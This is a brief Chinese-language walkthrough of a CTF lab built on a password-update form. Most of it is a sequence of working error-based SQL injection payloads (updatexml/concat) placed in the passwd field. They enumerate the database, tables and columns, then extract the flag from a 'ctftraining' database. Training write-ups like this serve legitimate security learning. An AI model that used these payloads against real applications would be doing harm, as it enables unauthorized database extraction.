User Name必须要是admin其他的都不行,看题目界面知道是更新密码的题,和之前的都有些不一样(所以按理说应该也是正确了不会有回显,错误了会有显示,所以应该用报错注入)
格式变成了这样
uname=admin&passwd=1'#&submit=Submit
查数据库
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,1),0x7e),1)#&submit=Submit
limit 1,1 就会出问题
查表名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' limit 0,1),0x7e),1)#&submit=Submit
,查列名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag' limit 0,1),0x7e),1)#&submit=Submit
查数据
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(flag) from ctftraining.flag limit 0,1),0x7e),1)#&submit=Submit